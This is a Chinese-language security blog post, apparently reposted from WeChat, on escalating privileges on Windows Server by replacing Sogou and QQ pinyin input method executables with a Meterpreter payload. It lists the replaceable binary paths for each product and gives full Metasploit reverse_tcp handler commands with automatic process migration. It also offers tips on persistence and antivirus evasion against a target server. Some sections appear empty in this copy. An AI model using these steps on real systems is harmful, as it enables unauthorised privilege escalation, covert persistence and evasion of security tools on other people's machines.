|
|
0x01 前言
0x02 测试环境
操作系统:Windows Server 2016 Datacenter软件版本:搜狗拼音输入法 9.5.0.3517、QQ拼音输入法6.4.5804.400搜狗拼音默认安装路径:C:Program Files (x86)SogouInputQQ拼音默认安装路径:C:Program Files (x86)TencentQQPinyin搜狗、QQ输入法进程名:SGTool.exe、SGDownload.exe、pinyinup.exe、SogouCloud.exe、SogouComMgr.exe、SGRender.exe、QQPYUserCenter.exe、QQPYLiveUp.exe、QQPYConfig.exe、QQPYToolbox.exe、QQPYCloud.exe......
0x03 搜狗拼音输入法
root@kali:~msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.0.120msf5 exploit(multi/handler) > set lport 443msf5 exploit(multi/handler) > set autorunscript post/windows/manage/migrate NAME=notepad.exemsf5 exploit(multi/handler) > exploit
其它搜狗拼音输入法可替换文件:
搜狗输入法 - 属性设置工具:%ProgramFiles(x86)%SogouInput9.5.0.3517SGTool.exe搜狗输入法 - 修复更新工具:%ProgramFiles(x86)%SogouInput9.5.0.3517SGDownload.exe搜狗输入法 - 网络更新程序:%ProgramFiles(x86)%SogouInput9.5.0.3517pinyinup.exe搜狗输入法 - 云计算代理:%ProgramFiles(x86)%SogouInput9.5.0.3517SogouCloud.exe搜狗输入法 - 云计算代理:%ProgramFiles(x86)%SogouInput9.5.0.3517SearchCand.dll搜狗输入法 - 工具箱:%ProgramFiles(x86)%SogouInputComponentsSogouComMgr.exe搜狗输入法 - 用户登录:%ProgramFiles(x86)%SogouInputComponentsSGRender1.0.0.56SGRender.exe
0x04 QQ拼音输入法
QQ拼音输入法 - 个人中心:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYUserCenter.exeQQ拼音输入法 - 升级工具:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYLiveUp.exeQQ拼音输入法 - 属性设置:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYConfig.exeQQ拼音输入法 - 工具箱:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYToolbox.exeQQ拼音云输入 - 客户端:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYCloud.exe
0x05 注意事项
-
如果目标机器为XP、2003系统的话我们就可以直接利用lpk.dll劫持来进行权限提升可能会更好; -
替换文件前要先备份好我们要替换的搜狗拼音输入法相关文件,便于我们后期将其恢复到原始状态; -
最终获取的Meterpreter会话权限取决于目标服务器登录的是哪个用户来执行我们的搜狗拼音输入法; -
同时也可以利用目标机器上的搜狗、QQ等输入法来进行权限维持,有安全防护还得自己做下免杀处理;
-
防止替换后的文件在运行后就退出而导致Meterpreter会话断开,笔者建议用migrate模块注入到其它进程中运行;
本文始发于微信公众号(贝塔安全实验室):安全攻防 | 利用QQ和搜狗输入法进行权限提升
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论